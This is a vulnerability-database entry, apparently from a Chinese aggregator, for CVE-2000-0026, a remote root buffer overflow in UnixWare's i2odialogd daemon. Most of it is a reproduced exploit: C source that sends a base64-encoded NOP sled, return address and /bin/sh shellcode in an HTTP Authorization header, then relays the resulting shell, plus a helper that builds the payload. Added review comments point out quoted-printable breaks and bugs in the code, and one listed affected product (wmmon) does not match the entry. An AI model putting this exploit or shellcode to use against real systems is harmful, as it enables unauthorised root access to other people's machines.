CVE-2000-0026
CVSS10.0
发布时间 :1999-12-21 00:00:00
修订时间 :2016-10-17 22:06:12
NMCOE    

[原文]Buffer overflow in UnixWare i2odialogd daemon allows remote attackers to gain root access via a long username/password authorization string.


[CNNVD]SCO UnixWare i2odialogd远程缓冲区溢出漏洞(CNNVD-199912-067)

        UnixWare i2odialogd守护进程中存在缓冲区溢出漏洞,远程攻击者可利用该漏洞通过一个超长的用户名/密码认证字符串获得root访问权限。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:windowmaker:wmmon:1.0b2
cpe:/o:sco:unixware:7.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0026
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0026
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-067
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=94606167110764&w=2
(UNKNOWN)  BUGTRAQ  19991223 FYI, SCO Security patches available.
http://www.securityfocus.com/bid/876
(UNKNOWN)  BID  876

- 漏洞信息

SCO UnixWare i2odialogd远程缓冲区溢出漏洞
危急 缓冲区溢出
1999-12-21 00:00:00 2005-05-02 00:00:00
远程  
        UnixWare i2odialogd守护进程中存在缓冲区溢出漏洞,远程攻击者可利用该漏洞通过一个超长的用户名/密码认证字符串获得root访问权限。

- 公告与补丁

        Fix available:
        SCO Unixware 7.1
        

- 漏洞信息 (19680)

SCO Unixware 7.1 i2odialogd Remote Buffer Overflow Vulnerability (EDBID:19680)
sco remote
1999-12-22 Verified
0 Brock Tellier
N/A [点击下载]
source: http://www.securityfocus.com/bid/876/info


UnixWare is a variant of the Unix operating system originally written by SCO, and distributed and maintained by Caldera.

i2odialogd is a daemon which provides a front-end for controlling the I2O subsystem. It is shipped with SCO UnixWare and is installed running as root by default. A serious buffer overflow vulnerability exists in its authentication mechanism. The username/password buffers are of a fixed length (88+ characters) with no bounds checking performed on them. Because of this it is possible to overflow the buffer, corrupt the stack and overwrite the return address, altering the flow of execution (and running arbitrary code). It should be noted that exploit code must be encoded (base64) before being sent to the server.

/* uwi2.c
 *
 * i2o remote root exploit for UnixWare 7.1
 * compile on UnixWare with cc -o uwi2 uwi2.c -lsocket -lnsl
 * ./uwi2 <hostname>
 * The hard-coded RET address is 0x8047d4c
 *
 * To either replace the shellcode or change the offset you must
 * first craft a program which outputs, in this order:
 * - 92 bytes of your RET address (EIP starts at 89)
 * - NOPs, as many as you would like
 * - your shellcode
 * - the character ":"
 * - any character, maybe "A", as I've done below
 * - NULL
 * When printf()'ing this string, do NOT append a \newline!
 * You then pipe the output of this program to a MIME encoder (mimencode
 * on UnixWare).  You then take the output of this program and paste it
 * where I've marked below.
 *
 * Brock Tellier btellier@usa.net
 *
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>

#define BUFLEN 10000 /* size of both the outgoing request buffer and the socket relay buffer */

/* since we're overflowing an Authenticate: Basic username */
/* our exploit code must be base64(MIME) encoded */

/*
 * Base64 (MIME) payload that main() appends after the "Authorization: Basic"
 * header below.  NOTE(review): the trailing "=" on each line followed by an
 * empty line is a quoted-printable soft line break inherited from the
 * mailing-list archive this listing was pasted from, not C source; as
 * reproduced here the string literal does not parse.
 */
char *mimecode =


/**** CHANGE THIS PART OF THE EXPLOIT STRING ****/
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQTH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6xteMduJXgeJXgyIXhExwLA7jX4HiflT=
"
"UVZW6xDo4P///y9iaW4vc2iqqqqqmqqqqqoHqpCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkDpB";
/************************************************/

/*
 * Fixed HTTP/1.0 request sent to the daemon.  The payload is carried in the
 * Basic credential, which the advisory text above says is copied into a
 * fixed-size buffer without a bounds check.  From a detection standpoint the
 * observable artefact is an abnormally long "Authorization: Basic" value in
 * a request to TCP port 360 (see i2oport below).
 */
char *auth=
"GET / HTTP/1.0\r\n"
"Host: localhost:360\r\n"
"Accept: text/html\r\n"
"Accept-Encoding: gzip, compress\r\n"
"Accept-Language: en\r\n"
"Negotiate: trans\r\n"
"User-Agent: xnec\r\n"
"Authorization: Basic";

char buf[BUFLEN];          /* outgoing request: auth + " " + mimecode + CRLF CRLF */
char sockbuf[BUFLEN];      /* relay buffer shared by both directions in main() */
char c;                    /* never used in this file */
int offset=0;              /* parsed from argv[2] in main() but never read afterwards */
int i, ascii,num;          /* only num is used (byte count returned by read()) */
int i2oport = 360;         /* TCP port the daemon listens on (matches the Host: header) */
int sock;
int addr = 0x80474b4;      /* never read in this file */
struct  sockaddr_in sock_a;
struct  hostent *host;

/*
 * Entry point: connects to argv[1] on i2oport, sends the prebuilt request
 * once, then relays bytes between stdin and the socket until killed.
 * argv[2] (optional) is parsed into offset, which nothing reads afterwards.
 * Uses the non-standard "void main" and calls exit()/atoi()/memcpy()/strlen()
 * without <stdlib.h>/<string.h>, relying on implicit declarations.
 * NOTE(review): the lone "=" lines inside the body are quoted-printable soft
 * line breaks from the archive, not C source.
 */
void main (int argc, char *argv[]) {
        =

 if(argc < 2) {
   fprintf(stderr, "Error:Usage: %s <hostname> \n", argv[0]);
   exit(0);
  }
 if(argc == 3) offset=atoi(argv[2]);
 =

 /* unbounded sprintf; writing the terminator afterwards does not prevent an
  * overrun should auth + mimecode ever exceed BUFLEN */
 sprintf(buf, "%s %s \r\n\r\n", auth, mimecode);
 buf[BUFLEN - 1] = 0;

 fprintf(stderr, "i2odialogd remote exploit for UnixWare 7.1\n");
 fprintf(stderr, "Brock Tellier btellier@usa.net\n");

 /* name resolution; h_addrtype is not checked against AF_INET */
 if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
    perror("gethostbyname"); =

    exit(-1);
  }
 =

 if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
    perror("create socket");
    exit(-1);
  }

 sock_a.sin_family=AF_INET;
 sock_a.sin_port=htons(i2oport);
 memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
 if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
    perror("create connect");
    exit(-1);
  }

  fflush(stdout);

  // write exploit
  /* single unchecked write(); a short write is not retried */
  write(sock,buf,strlen(buf));

  //begin read
  /* relay loop.  NOTE(review): `input` is never cleared with FD_ZERO, so
   * select() is handed an uninitialised descriptor set on every iteration;
   * read() results are not checked for 0 or -1 before being passed to
   * write(), so a closed peer or stdin EOF is not detected and the loop
   * presumably spins rather than exiting. */
  while(1) {
    fd_set input;
    FD_SET(0,&input);
    FD_SET(sock,&input);
    select(sock+1,&input,NULL,NULL,NULL);

    if(FD_ISSET(sock,&input)) {
      num=read(sock,sockbuf,BUFLEN);
      write(1,sockbuf,num);
     }
     if(FD_ISSET(0,&input))
     write(sock,sockbuf,read(0,sockbuf,BUFLEN));
  }
}

------

--- addr.c ---

/*
 * addr.c - Add-on for the UnixWare 7.1 remote root exploit in i2odialogd
 * simply MIME encode the output of this program and put into the
 * appropriate place in uwi2.c
 *
 * Usage: cc -o addr addr.c; ./addr <offset> <size>
 *
 * Brock Tellier btellier@usa.net
*/

#include <stdio.h>
#define NOP 0x90

/*
 * Raw i386 byte string that main() copies into the output buffer at
 * offset 300.  NOTE(review): the "=" after the declarator followed by an
 * empty line is a quoted-printable soft line break from the archive, not C
 * source; as reproduced here the declaration does not parse.
 */
char scoshell[]= =

"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/*
 * Entry point: fills a <size>-byte buffer with NOP bytes, stores
 * 0x8046000+offset at byte offsets 60..96, copies scoshell to offset 300,
 * terminates it with ':', 'A' and NUL, and prints it to stdout for the
 * caller to MIME-encode.  argv[1] = offset, argv[2] = size (default 400),
 * both via atoi() with no error reporting.  memset()/strlen()/atoi() are
 * called without <string.h>/<stdlib.h>, relying on implicit declarations.
 * NOTE(review): the "=" after buf[size - 3] is a quoted-printable soft line
 * break from the archive, not C source.
 */
void main(int argc, char *argv[]) {

long addr;
char buf[2000];
int i;
int offset;             /* NOTE(review): uninitialised when argc <= 1, yet read below */
int size = 400;         /* not validated: > 2000 overruns buf, < 3 indexes before it */

if (argc > 1) offset = atoi(argv[1]);
if (argc > 2) size = atoi(argv[2]);

addr=0x8046000 + offset;
memset(buf, NOP, size);
/* stores a long through an int pointer at unaligned positions inside a char
 * array; relies on i386 tolerating that, UB under strict aliasing rules */
for(i=60;i<100;i+=4)*(int *)&buf[i]=addr;
for(i = 0; i < strlen(scoshell); i++)
   buf[i+300] = scoshell[i];
buf[size - 3] = ':'; =

buf[size - 2] = 'A';
buf[size - 1] = 0;
/* "%x" receives a long: mismatched conversion, harmless only where int == long */
fprintf(stderr, "using addr 0x%x with offset %d \n", addr, offset);
fprintf(stderr, "mime-encode the stdoutput!\n");
/* non-literal format string (CERT FIO30-C): any '%' byte in buf would be
 * interpreted as a conversion rather than emitted verbatim */
printf(buf);

}

		

- 漏洞信息

6310
SCO UnixWare i2odialogd Daemon Username Authorization String Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

The i2odialog daemon in UnixWare contains a flaw that may allow a remote attacker to gain access to unauthorized privileges. The issue is triggered due to improper bounds checking in the i2odialog daemon, resulting in a buffer overflow. When sending a long username/password authorization string of 88 or more characters, a remote attacker could gain root access, resulting in a loss of integrity.

- 时间线

1999-12-22 Unknown
1999-12-22 Unknown

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 
